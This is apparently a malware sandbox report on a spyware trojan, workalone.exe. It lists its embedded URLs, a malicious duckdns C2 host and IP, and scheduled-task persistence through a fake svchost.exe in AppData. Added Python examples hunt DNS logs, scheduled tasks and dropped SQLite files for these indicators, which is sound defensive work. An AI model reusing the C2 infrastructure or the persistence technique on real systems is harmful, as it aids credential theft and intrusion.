https://duckduckgo.com/chrome_newtab | workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.dr | false | | high
https://duckduckgo.com/ac/?q= | tmp1B56.tmp.1.dr | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.dr | false | | high
http://ns.adobe.cobj | workalone.exe, 00000001.00000003.385517483.0000000008C81000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404595530.0000000008C91000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404434533.0000000008C90000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Endpoint/CheckConnectResponse | workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.datacontract.org/2004/07/ | workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Endpoint/EnvironmentSettings | workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/t_ | workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.ip.sb/geoip%USERPEnvironmentROFILE% | workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/envelope/ | workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://saleshor12.duckdns.org:46539 | workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://search.yahoo.com?fr=crmas_sfpf | workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.dr | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | tmp1B56.tmp.1.dr | false | | high
http://schemas.xmlsoap.org/soap/envelope/D | workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://saleshor12.duckdns.org | workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/ | workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Endpoint/CheckConnect | workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.dr | false | | high
http://ns.adobe.c/g | workalone.exe, 00000001.00000003.385517483.0000000008C81000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404595530.0000000008C91000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404434533.0000000008C90000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Endpoint/VerifyUpdateResponse | workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Endpoint/SetEnviron | workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command= | workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.dr | false | | high
http://tempuri.org/Endpoint/SetEnvironment | workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Endpoint/SetEnvironmentResponse | workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Endpoint/GetUpdates | workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ac.ecosia.org/autocomplete?q= | tmp1B56.tmp.1.dr | false | | high
https://search.yahoo.com?fr=crmas_sfp | workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.dr | false | | high
https://api.ipify.orgcookies//settinString.Removeg | workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp | true | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing | workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/fault | workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Endpoint/GetUpdatesResponse | workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Endpoint/EnvironmentSettingsResponse | workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Endpoint/VerifyUpdate | workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/0 | workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | tmp1B56.tmp.1.dr | false | | high
http://schemas.xmlsoap.org/soap/actor/next | workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ns.ado/1 | workalone.exe, 00000001.00000003.385517483.0000000008C81000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404595530.0000000008C91000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404434533.0000000008C90000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://saleshor12.duckdns.org: | workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp | false
                                                          • Avira URL Cloud: safe
                                                          unknown
IP | Domain | Country | ASN | ASN Name | Malicious
85.208.136.178 | saleshor12.duckdns.org | Germany | 33657 | CMCSUS | true
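The contacted host table above marks 85.208.136.178 (saleshor12.duckdns.org, AS33657) as malicious while the string table lists the same duckdns.org name with an Avira URL Cloud verdict of "safe" and an unknown reputation, the usual situation for a freshly registered dynamic-DNS name. Hunting therefore has to match the exact host and IP rather than rely on reputation, and should surface any other lookup under the provider. The following is an added example written for this page, not Joe Sandbox output: the log line layout (timestamp, client, query name, answer) is an assumed simplification, the sample lines are constructed with RFC 5737 documentation addresses except for the report's own IP, and the dynamic-DNS suffixes other than duckdns.org are assumptions to extend for your environment.

```python
"""Hunt DNS logs for the C2 indicators in this report and for other lookups
under dynamic-DNS providers.  Added example; the log format, the sample
lines and the extra provider suffixes are assumptions, not sandbox data."""
import ipaddress
import re
from dataclasses import dataclass

# Indicators taken from the report's network tables.
IOC_DOMAINS = {"saleshor12.duckdns.org"}
IOC_IPS = {ipaddress.ip_address("85.208.136.178")}

# duckdns.org comes from the report; the other suffixes are assumed, extend as needed.
DYNAMIC_DNS_SUFFIXES = ("duckdns.org", "no-ip.org", "ddns.net")

# Assumed log layout: "<ISO timestamp> <client-ip> <query-name> <answer-ip|NXDOMAIN>"
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qname>\S+)\s+(?P<answer>\S+)$")


@dataclass(frozen=True)
class Hit:
    ts: str
    client: str
    qname: str
    answer: str
    reasons: tuple


def reasons_for(qname: str, answer: str) -> tuple:
    """Return the reasons a query/answer pair is interesting, in a fixed order."""
    name = qname.rstrip(".").lower()          # normalise trailing dot and case
    reasons = []
    if name in IOC_DOMAINS:
        reasons.append("ioc-domain")
    try:
        if ipaddress.ip_address(answer) in IOC_IPS:
            reasons.append("ioc-ip")
    except ValueError:
        pass                                  # NXDOMAIN or a non-IP answer
    # Match names registered *under* a provider, not the provider apex itself.
    if any(name.endswith("." + s) for s in DYNAMIC_DNS_SUFFIXES):
        reasons.append("dynamic-dns")
    return tuple(reasons)


def scan(lines) -> list:
    """Parse log lines and return a Hit for every line with at least one reason."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue                          # skip lines that do not fit the layout
        r = reasons_for(m["qname"], m["answer"])
        if r:
            hits.append(Hit(m["ts"], m["client"], m["qname"], m["answer"], r))
    return hits


# Constructed sample log (not captured traffic); 203.0.113.0/24 is documentation space.
SAMPLE_LOG = """\
2022-11-30T00:07:01Z 10.0.0.15 saleshor12.duckdns.org 85.208.136.178
2022-11-30T00:07:02Z 10.0.0.15 api.ipify.org 203.0.113.10
2022-11-30T00:07:03Z 10.0.0.22 fs.microsoft.com 203.0.113.20
2022-11-30T00:07:04Z 10.0.0.31 homeserver.duckdns.org NXDOMAIN
"""

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG.splitlines()):
        print(h.ts, h.client, h.qname, h.answer, ",".join(h.reasons))
```

The "dynamic-dns" reason fires on its own for the second duckdns.org name even though it resolved to nothing, which is the point: a reputation feed would not have flagged the C2 host either on the day of this analysis, so the provider suffix is the durable signal.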
                                                          Joe Sandbox Version:36.0.0 Rainbow Opal
                                                          Analysis ID:756291
                                                          Start date and time:2022-11-30 00:06:06 +01:00
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 7m 33s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Sample file name:workalone.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:20
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@15/29@5/1
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HDC Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                          • TCP Packets have been reduced to 100
                                                          • Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172
                                                          • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
00:07:08 | Task Scheduler | Run new task: Nafifas path: "C:\Users\user\AppData\Roaming\svchost\svchost.exe"
00:07:54 | API Interceptor | 95x Sleep call for process: workalone.exe modified
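The scheduled task in the timeline above runs a file named svchost.exe from C:\Users\user\AppData\Roaming\svchost\, a system-binary name in a user-writable directory. Both properties can be checked on every task on a host from the verbose CSV that `schtasks /query /fo CSV /v` prints. The following is an added example for this page, not part of the report: the CSV embedded in it is a constructed subset of that command's columns (the real output has many more), the list of system binary names is an assumption to extend, and the expansion of %windir%/%SystemRoot% assumes Windows is installed on C:.

```python
"""Flag scheduled tasks whose action runs from a user profile or reuses a
Windows system binary name outside the Windows directory, the pattern in the
timeline above (task "Nafifas" running svchost.exe from AppData\\Roaming).
Added example; the CSV is a constructed subset of `schtasks /query /fo CSV /v`
columns, not output captured from the sandbox."""
import csv
import io
import ntpath
import re

# Names that legitimately live only under %SystemRoot%; assumed list, extend it.
SYSTEM_BINARY_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "explorer.exe"}
WINDOWS_DIR = "c:\\windows\\"          # assumption: Windows installed on C:
USER_WRITABLE = re.compile(r"^c:\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\")


def first_token(command: str) -> str:
    """Return the executable part of a 'Task To Run' value, honouring quotes."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]


def task_reasons(task_to_run: str) -> tuple:
    """Reasons a task action is suspicious, in a fixed order (empty if none)."""
    low = first_token(task_to_run).lower()
    low = low.replace("%windir%", "c:\\windows").replace("%systemroot%", "c:\\windows")
    reasons = []
    if USER_WRITABLE.match(low):
        reasons.append("runs-from-user-profile")
    if ntpath.basename(low) in SYSTEM_BINARY_NAMES and not low.startswith(WINDOWS_DIR):
        reasons.append("system-binary-name-outside-windows-dir")
    return tuple(reasons)


def hunt(schtasks_csv: str) -> list:
    """Return (TaskName, Task To Run, reasons) for every suspicious task."""
    findings = []
    for row in csv.DictReader(io.StringIO(schtasks_csv)):
        cmd = row.get("Task To Run", "")
        r = task_reasons(cmd)
        if r:
            findings.append((row["TaskName"], cmd, r))
    return findings


# Constructed sample (subset of schtasks /query /fo CSV /v columns); the first
# row mirrors the task the sandbox observed, the other two are benign fillers.
SAMPLE_CSV = r'''"HostName","TaskName","Status","Author","Task To Run","Run As User"
"HOST01","\Nafifas","Ready","user","C:\Users\user\AppData\Roaming\svchost\svchost.exe","user"
"HOST01","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -o -$","SYSTEM"
"HOST01","\Backup","Ready","user","""C:\Program Files\Backup Tool\backup.exe"" --nightly","user"
'''

if __name__ == "__main__":
    for name, cmd, reasons in hunt(SAMPLE_CSV):
        print(f"{name}: {cmd}  [{', '.join(reasons)}]")
```

On a live host, pipe the command's output into `hunt` (for example `hunt(subprocess.run(["schtasks", "/query", "/fo", "CSV", "/v"], capture_output=True, text=True).stdout)`); the quote handling in `first_token` matters because legitimate vendor tasks usually quote paths under Program Files.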
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):612
                                                          Entropy (8bit):5.33730556823153
                                                          Encrypted:false
                                                          SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21xzAbDLI4M9XKbbDLI4MWuPJKiUrRZ9I0Z7:MLUE4K5E4Ks2vsXE4qXKDE4KhK3VZ9p7
                                                          MD5:F06804B809C3212C7F29ABA89E9FAF16
                                                          SHA1:B49ED216A41EA579FF109A4BA44A8E62C2B1A3BB
                                                          SHA-256:E63AFB84BF09F02C3C19978966E610BEE5C14099B1A65C8B34E426ABC127ECB7
                                                          SHA-512:53ED48D5233FD6318320264400ACBD451A7C6B10BB2A11C2B95F51C3838708835D1016B417748E7C50023BAF179AC94CCAAE230C71AC073D0233765409341D49
                                                          Malicious:true
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):49152
                                                          Entropy (8bit):0.7876734657715041
                                                          Encrypted:false
                                                          SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                          MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                          SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                          SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                          SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
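The "File Type" lines of the two SQLite entries above (page size 2048, file counter 4 and 2, database pages 45 and 23, cookies 0x3d and 0x19, schema 4, UTF-8, SQLite version 3038005) are decoded from the fixed 100-byte header at the start of every SQLite 3 file, and the "Entropy (8bit)" figure is the Shannon entropy of the file in bits per byte. Reproducing both offline is a quick way to triage dropped temp files without opening them in a database engine. The following is an added example for this page, not sandbox code: the field offsets follow the public SQLite file-format specification, and the headers it parses are constructed from the values reported above rather than taken from the dropped files themselves.

```python
"""Parse the 100-byte header of an SQLite 3 file and measure byte entropy,
reproducing the fields the dropped-file entries above report.  Added example;
the headers below are constructed from the report's values, not the dropped
files, and the layout follows https://www.sqlite.org/fileformat.html."""
import math
import struct
from collections import Counter

MAGIC = b"SQLite format 3\x00"
ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}
# Big-endian layout: 16s magic, H page size, 6B (write/read version, reserved
# bytes per page, payload fractions), 12I (change counter ... application id),
# 20x reserved, 2I (version-valid-for, SQLITE_VERSION_NUMBER) = 100 bytes.
HEADER = struct.Struct(">16sH6B12I20x2I")


def parse_sqlite_header(data: bytes) -> dict:
    """Return the header fields a triage tool prints for a dropped file."""
    if len(data) < HEADER.size or data[:16] != MAGIC:
        raise ValueError("not an SQLite 3 database")
    f = HEADER.unpack_from(data)
    return {
        "page_size": 65536 if f[1] == 1 else f[1],   # the value 1 encodes 65536
        "change_counter": f[8],
        "page_count": f[9],
        "schema_cookie": f[12],
        "schema_format": f[13],
        "text_encoding": ENCODINGS.get(f[16], f"unknown({f[16]})"),
        "version_valid_for": f[20],
        "sqlite_version": f[21],
    }


def describe(data: bytes) -> str:
    """Format the fields the way the report's 'File Type' line does."""
    h = parse_sqlite_header(data)
    return ("SQLite 3.x database, last written using SQLite version "
            f"{h['sqlite_version']}, page size {h['page_size']}, "
            f"file counter {h['change_counter']}, database pages {h['page_count']}, "
            f"cookie 0x{h['schema_cookie']:x}, schema {h['schema_format']}, "
            f"{h['text_encoding']}, version-valid-for {h['version_valid_for']}")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte (0..8), the report's 'Entropy (8bit)' measure."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def build_header(page_size, change_counter, page_count, schema_cookie,
                 sqlite_version=3038005) -> bytes:
    """Constructed header for demonstration only (not bytes from the sandbox)."""
    return HEADER.pack(MAGIC, 1 if page_size == 65536 else page_size,
                       1, 1, 0, 64, 32, 32,                 # versions, reserved, payload fractions
                       change_counter, page_count, 0, 0,    # counter, pages, freelist trunk/count
                       schema_cookie, 4, 0, 0, 1, 0, 0, 0,  # cookie, schema 4, cache, vacuum, UTF-8 ...
                       change_counter, sqlite_version)      # version-valid-for == change counter


if __name__ == "__main__":
    # Values from the two distinct dropped-file entries above.
    for hdr in (build_header(2048, 4, 45, 0x3d), build_header(2048, 2, 23, 0x19)):
        print(describe(hdr))
    # A file that is almost all zero pages scores near 0 bits/byte; the real
    # copies above score about 1.3, i.e. small tables inside mostly empty pages.
    padded = build_header(2048, 4, 45, 0x3d) + b"\x00" * (46 * 2048 - HEADER.size)
    print(round(shannon_entropy(padded), 3))
```

Note that the page-count field is only trustworthy when "version-valid-for" equals the change counter, which `build_header` guarantees and which holds for both entries above (4/4 and 2/2); a real triage script should check that equality before reporting the count.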
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\workalone.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
